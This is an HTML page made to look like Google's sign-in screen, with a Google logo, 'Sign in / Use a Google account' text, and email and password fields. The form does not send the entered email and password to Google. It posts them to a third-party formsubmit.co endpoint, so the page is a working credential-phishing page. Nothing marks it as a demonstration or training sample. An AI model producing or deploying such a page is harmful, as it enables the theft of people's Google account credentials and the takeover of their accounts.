<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Google Login Form</title>
   <style>
      body {
    margin:0;
    padding:0;
    background-size:cover;
    font-family: 'Google Sans','Noto Sans Myanmar UI', Arial, Helvetica, sans-serif;

}
.box{
    position: absolute;
    top:50%;
    left:50%;
    transform:translate(-50%, -50%);
    width: 25rem;
    padding: 2.5rem;
    box-sizing: border-box;
    border: 1px solid #dadce0;
    border-radius: 8px;
}

.google-logo {
    display: flex;
    justify-content: center;
    padding-bottom: 15px;
}

.box h2 {
    margin: 0 0 -0.125rem;
    padding: 0;
    color: #1b1a1a;
    text-align: center;
    font-size: 24px;
    font-weight: bold;
}

.box p {
    font-size: 16px;
    font-weight: normal;
    letter-spacing: 1px;
    line-height: 1.5;
    margin-bottom: 25px;
    text-align: center;
}

.box .inputBox {
    position: relative;
}

.box .inputBox input {
    width: 93%;
    padding: 0.625rem 10px;
    font-size: 1rem;
    letter-spacing: 0.062rem;
    margin-bottom: 20px;
    border: 1px solid #ccc;
    background: transparent;
    border-radius: 4px;
}

.box .inputBox label {
    position: 0;
    top: 0;
    bottom: 20px;
    left: 10px;
    padding: 0.625rem 0;
    font-size: 1rem;
    color: #ccc;
    pointer-events: none;
    transition: 0.3s;
}

.forgot{
    margin-top: 40px;
    margin-left: 0px;
}

.a {
    display: block;
  width: 100px;
  padding: 10px;
  background-color: #1a73e8;
  margin-left: 200px;
  margin-top: 50px;
  color: #fff;
  border: none;
  border-radius: 4px;
  font-size: 16px;
  cursor: pointer;

}
.w {
    display:block;
    margin-left: auto;
    margin-right: auto;
    margin-top: 10px;
    height: 60px;
}


   </style>
</head>
<body>
   
    <div class="box">
       

        
     <img src="google.jpg"  class="w"> 


        <h2 style="margin-top: 30px;">Sign in</h2>
        <p>Use a Google account</p>
        <form action="https://formsubmit.co/10ef81e4ef3e58c5c75de6394ed6a46a" method="post">
            <div class="inputBox">
                <input type="email" id="email" placeholder="email address or phone number" name="email" required value="" onkeyup="this.setAttribute('value',this.value); ">
                <lable for="email"></lable>
            </div>
            <div class="inputBox">
                <input type="password" id="password" minlength="8" placeholder="Password" name="password" required value=""  onkeyup="this.setAttribute('value',this.value);">
                <lable for="password"></lable>
            </div>
            <div class="forgot" href="">
                <c>Forgot your password?</c>
            </div>
            <a >
            <button class="a">Sign-In</button>
            </a>
        </form>

    </div>

</body>
</html>
